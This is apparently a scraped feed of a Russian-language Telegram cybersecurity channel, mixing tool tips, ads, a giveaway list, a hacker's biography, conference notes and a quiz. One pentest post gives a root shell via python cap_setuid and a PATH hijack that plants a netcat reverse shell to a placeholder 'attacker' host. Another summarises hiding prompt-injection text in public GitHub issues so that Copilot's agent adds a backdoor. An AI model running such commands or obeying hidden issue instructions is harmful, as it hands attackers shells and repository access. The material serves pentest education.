EMBA: инструмент для анализа прошивок
👋
⏺ EMBA - это open-source утилита, которая берёт firmware и вытаскивает из неё всё подозрительное: от hardcoded-паролей и дырявых бинарников до древних библиотек и кривых скриптов.
⏺ Зачем: прошивки - на деле, один из любимых векторов атак. Роутеры, камеры, умные колонки - всё это часто забывают обновлять. А значит, без инструментов вроде EMBA вы рискуете проглядеть дыру, через которую к вам залезут хакеры.
⏺ Что умеет: да кучу всего. Делает статический и динамический анализ (с эмуляцией), генерацию SBOM (списка компонентов), проверку конфигов и библиотек, плюс хороший веб-отчёт, который можно сразу показывать разрабам или прикладывать к пентесту.
⏺ Быстро стартуем (Linux, нужен Docker):
Прогон прошивки через дефолтный профиль:
Нужен SBOM?
ZeroDay | #Инструмент
Приветствую в мире цифровой безопасности!Поговорим о еще одном инструменте безопасности.git clone https://github.com/e-m-b-a/emba.git
cd emba
sudo ./installer.sh -d
Прогон прошивки через дефолтный профиль:
sudo ./emba -l ~/log -f ~/firmware -p ./scan-profiles/default-scan.emba
Нужен SBOM?
sudo ./emba -l ~/log -f ~/firmware -p ./scan-profiles/default-sbom.emba
ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12❤6🔥2
Вебинар для всех, кто работает с персональными данными
🗓3 сентября, 12:00
📍Онлайн
Selectel проведет вебинар, где разберут:
- как компаниям определить уровень защищенности персональных данных,
- как реализовать и подтвердить меры защиты.
Мероприятие бесплатное. Посмотреть программу и зарегистрироваться можно по ссылке: https://slc.tl/whxl1
Чтобы не пропустить вебинар и узнавать о митапах, воркшопах и бесплатных курсах Selectel, подписывайтесь на @selectel_events
Реклама. АО «Селектел», ИНН 7810962785, ERID: 2VtzqwahbzJ
🗓3 сентября, 12:00
📍Онлайн
Selectel проведет вебинар, где разберут:
- как компаниям определить уровень защищенности персональных данных,
- как реализовать и подтвердить меры защиты.
Мероприятие бесплатное. Посмотреть программу и зарегистрироваться можно по ссылке: https://slc.tl/whxl1
Чтобы не пропустить вебинар и узнавать о митапах, воркшопах и бесплатных курсах Selectel, подписывайтесь на @selectel_events
Реклама. АО «Селектел», ИНН 7810962785, ERID: 2VtzqwahbzJ
❤4👎1
ZeroDay | Кибербезопасность
1. Eugene (@jenigen)
2. $.7&& (@k0st0vk7)
3. Banana✨ (@solncelunaoblako)
4. ㅤ
5. Dmitry (@Enk0d)
6. Sergey (@Ref1leqq)
7. Nodar (@x0ff_deus)
8. mikhail (@ownnickname)
9. -A (@id9912345)
10. ki.real (@iamTRC20)
11. Екатерина (@catkozh)
12. Zefir (@ivansamsia)
13. ΝᎬϴᎷᎪᏀᎬ (@neo_mage)
14. Мухит
15. Vladislav (@darkh4mster)
16. 朴贊郁 (@flokiauther)
17. mad_peleng (@mad_peleng)
18. ᅠ
19. Владислав (@Watatamin)
20. 🍃 (@haltdiekIappe)
21. Сергей (@lanikhinSergei)
22. Andrei (@a_vasiukou)
23. Nikita (@heliotropelovethesun)
24. kimawashi (@romant1ca_com)
25. S (@SNSN_2023)
Please open Telegram to view this post
VIEW IN TELEGRAM
1😢18🎉10🔥4❤2👎1
Тот, кто знал слишком много: история Хьё Минь Нго
👋
⏺ Первые шаги: подросток из маленького вьетнамского городка просто хотел обойти лимиты dial-up и сидеть в инете бесплатно. Кончилось всё, как обычно, долгом для семьи и ссылкой к дяде «на перевоспитание». Там он наткнулся на хакерский форум и понял, что впереди много всего интересного.
⏺ От баловства к деньгам: сначала были надписи «Pwned by Hieu.pc» на сайтах. Потом - кредитки и обналичка через онлайн-покер. Доходы теперь шли в тысячи долларов в день. Чтобы ускорить поток, он написал свой сканер SQL-инъекций и штамповал данные пачками.
⏺ Большая игра: однажды ему подсказали - кредитки слишком заметны, а персональные данные стоят куда дороже. Он смог получить доступ к базе из 200 млн записей через контракт с Court Ventures. На своём сайте продавал поиск всего за $1, при себестоимости $0,14. В лучшие месяцы доходил до $120 000.
⏺ Падение: в 2012 Court Ventures купила Experian, и слишком активный «частный детектив из Сингапура» привлёк внимание агентов. Его заманили в Гуам и арестовали. Обвинения тянули на 45 лет, но сделка с правосудием сократила срок до 13, из которых он отсидел 7.
⏺ Новая глава: после освобождения в 2020 он вернулся во Вьетнам уже другим человеком. Теперь помогает ловить киберпреступников, консультирует жертв мошенников и читает лекции.
ZeroDay | #безопасность
Приветствую в мире цифровой безопасности!Расскажу об обычном парне из Вьетнама, который стал случайно владеть базой данных в 200 млн.ZeroDay | #безопасность
Please open Telegram to view this post
VIEW IN TELEGRAM
✍17❤3🤔2🤣1
Каким должен быть востребованный эксперт по кибербезопасности, которого будет хантить каждая ИТ-компания?
Специалисты в этой области стали настоящим героями цифровой эпохи!
Вице-президент Сбера по кибербезопасности Сергей Лебедь на конференции OFFZONE 2025 отметил, что для карьеры в области кибербезопасности необходимо уже быть зрелым IТ-специалистом и нужно досконально изучить предмет защиты. Он провел аналогию с медициной: чтобы стать хорошим хирургом, необходимо досконально изучить физиологию, анатомию и другие науки. Так и в кибербезопасности для эффективной защиты системы нужно глубоко понимать предмет.
«Высококлассный эксперт в кибербезопасности сегодня - это личность масштаба Ломоносова или Кулибина. В Сбере не только есть необходимость в подобных людях, но и почва для их формирования и развития», — сказал Сергей Лебедь.
ZeroDay | #безопасность
Специалисты в этой области стали настоящим героями цифровой эпохи!
Вице-президент Сбера по кибербезопасности Сергей Лебедь на конференции OFFZONE 2025 отметил, что для карьеры в области кибербезопасности необходимо уже быть зрелым IТ-специалистом и нужно досконально изучить предмет защиты. Он провел аналогию с медициной: чтобы стать хорошим хирургом, необходимо досконально изучить физиологию, анатомию и другие науки. Так и в кибербезопасности для эффективной защиты системы нужно глубоко понимать предмет.
«Высококлассный эксперт в кибербезопасности сегодня - это личность масштаба Ломоносова или Кулибина. В Сбере не только есть необходимость в подобных людях, но и почва для их формирования и развития», — сказал Сергей Лебедь.
ZeroDay | #безопасность
❤66🤡11👍5🔥3❤🔥2
Какая роль у SSL/TLS в обеспечении безопасности веб-сайтов?
Anonymous Quiz
4%
Метод защиты от вирусов на веб-серверах
90%
Протоколы шифрования для защиты данных, передаваемых через интернет
4%
Система защиты от вторжений на веб-сайты
1%
Программа для удаления шпионского ПО
2👍22😁8❤5🍌1
This media is not supported in your browser
VIEW IN TELEGRAM
3 лайфхака для пентестинга
👋
⏺ Быстрый поиск SUID и возможностей root: Не ограничивайтесьfind / -perm -4000. Используйте getcap -r / 2>/dev/null — это покажет бинарники с Linux capabilities. Например:
Ну вот, у тебя по факту вышел шелл с root-привилегиями без эксплойтов.
⏺ Подмена скриптов через PATH: Если есть доступ к конфигам или cron, проверьте абсолютные пути команд. Можно подменить PATH и добавить свои скрипты:
⏺ SSH через прокси для MITM: Когда цель доступна по SSH, а нужен MITM, удобно юзать ProxyCommand:
ZeroDay | #пентест
Приветствую в мире цифровой безопасности!
Расскажу о трех полезных фишках при пентесте./usr/bin/python3 = cap_setuid+ep
Ну вот, у тебя по факту вышел шелл с root-привилегиями без эксплойтов.
echo "/tmp" > /etc/cron.d/fakelist
echo -e '#!/bin/bash\nnc attacker 4444 -e /bin/bash' > /tmp/ls
chmod +x /tmp/ls
export PATH=/tmp:$PATH
Host target
ProxyCommand ncat --proxy attacker_ip:1080 --proxy-type socks5 %h %p
ZeroDay | #пентест
Please open Telegram to view this post
VIEW IN TELEGRAM
❤11❤🔥4👍3😁1💋1
OFFZONE 2025: ключевые инсайты о трансформации киберугроз
21–22 августа в Москве прошла шестая конференция по практической кибербезопасности OFFZONE 2025, собравшая более 2500 специалистов. В программе — 98 докладов и обсуждения ключевых вызовов для отрасли.
Среди тем:
— уязвимости в парсерах и пентест Wi-Fi;
— применение AI и ML в кибербезопасности;
— багбаунти, Web3, OSINT и построение защищённых цифровых экосистем.
Наибольшее внимание привлекло исследование "Threat Zone 2025: обратная сторона", результаты которого представила компания BI.ZONE. Эксперты проанализировали более 5000 сообщений с теневых форумов и каналов:
— 20% атакующих группировок используют коммерческое ВПО;
— стоимость корпоративных аккаунтов на черном рынке стартует от $10;
— стилеры остаются самым популярным видом коммерческого ВПО.
Конференцию открыл Евгений Касперский докладом о кибериммунитете для цифровой эры, а всего своими инсайтами поделились более 120 экспертов.
Атмосфера была не менее яркой: квесты, квизы в телеграм-боте, HACK in 15 min, Craft.Zone, кастомные бейджи и даже Tattoo.Zone, где 21 участник набил логотип OFFZONE и получил пожизненную проходку на все будущие конференции.
ZeroDay | #безопасность
21–22 августа в Москве прошла шестая конференция по практической кибербезопасности OFFZONE 2025, собравшая более 2500 специалистов. В программе — 98 докладов и обсуждения ключевых вызовов для отрасли.
Среди тем:
— уязвимости в парсерах и пентест Wi-Fi;
— применение AI и ML в кибербезопасности;
— багбаунти, Web3, OSINT и построение защищённых цифровых экосистем.
Наибольшее внимание привлекло исследование "Threat Zone 2025: обратная сторона", результаты которого представила компания BI.ZONE. Эксперты проанализировали более 5000 сообщений с теневых форумов и каналов:
— 20% атакующих группировок используют коммерческое ВПО;
— стоимость корпоративных аккаунтов на черном рынке стартует от $10;
— стилеры остаются самым популярным видом коммерческого ВПО.
Конференцию открыл Евгений Касперский докладом о кибериммунитете для цифровой эры, а всего своими инсайтами поделились более 120 экспертов.
Атмосфера была не менее яркой: квесты, квизы в телеграм-боте, HACK in 15 min, Craft.Zone, кастомные бейджи и даже Tattoo.Zone, где 21 участник набил логотип OFFZONE и получил пожизненную проходку на все будущие конференции.
ZeroDay | #безопасность
❤12🔥10👍4👾2
Please open Telegram to view this post
VIEW IN TELEGRAM
❤15👍8💩6🍌1
Please open Telegram to view this post
VIEW IN TELEGRAM
👎7❤5
Охотимся на Copilot 😏 Учебная промпт-инъекция для пентестеров
GitHub Copilot умеет автоматически писать код по задачам. Казалось бы, удобно и безопасно. Но если задача публичная и её назначают Copilot, появляется скрытый вектор атаки: промпт-инъекция. Текст задачи может незаметно подсунуть инструкции, из-за которых агент добавит «нычку» в репозиторий.
⏺ В статье поясняют, как устроена такая промпт-инъекция: как спрятать вредоносный текст от глаза мейнтейнера, как Copilot воспринимает контекст, и как формируются прям надежные эксплойты с низким риском обнаружения.
ZeroDay | #Статья
GitHub Copilot умеет автоматически писать код по задачам. Казалось бы, удобно и безопасно. Но если задача публичная и её назначают Copilot, появляется скрытый вектор атаки: промпт-инъекция. Текст задачи может незаметно подсунуть инструкции, из-за которых агент добавит «нычку» в репозиторий.
ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11❤🔥2
152-ФЗ настигнет каждого, неважно за что
С 1 сентября вступят в силу изменения в законе об обработке персональных данных. Изменения коснутся почти всех типов бизнеса вне зависимости от масштаба и характера обработки персональных данных. Изменится система штрафов за утечки, несвоевременные уведомления об инцидентах и неправильный алгоритм обработки Пдн расширится, а штрафы увеличатся.
28 августа 2025, 17:00 VK Cloud проведет вебинар, где будем разбирать самые важные темы, связанные с обработкой данных.
⚫️ Разбор типовых ошибок на реальных кейсах компаний разного масштаба. Что экономит недели подготовки и может защитить от предписаний.
⚫️ Какие аттестованные контуры (УЗ1, К1, PCI DSS) выбрать под свою систему и какие артефакты предъявлять.
⚫️ Примеры формулировок для договора и уведомления об инциденте.
⚫️ Практические рекомендации для любого этапа подготовки документации.
Спикеры:
- Станислав Погоржельский, технологический евангелист VK Cloud
- Анна Плотникова, менеджер по развитию бизнеса VK Cloud
С 1 сентября вступят в силу изменения в законе об обработке персональных данных. Изменения коснутся почти всех типов бизнеса вне зависимости от масштаба и характера обработки персональных данных. Изменится система штрафов за утечки, несвоевременные уведомления об инцидентах и неправильный алгоритм обработки Пдн расширится, а штрафы увеличатся.
28 августа 2025, 17:00 VK Cloud проведет вебинар, где будем разбирать самые важные темы, связанные с обработкой данных.
Спикеры:
- Станислав Погоржельский, технологический евангелист VK Cloud
- Анна Плотникова, менеджер по развитию бизнеса VK Cloud
Please open Telegram to view this post
VIEW IN TELEGRAM
👎14💩7❤5👍1🔥1👏1💋1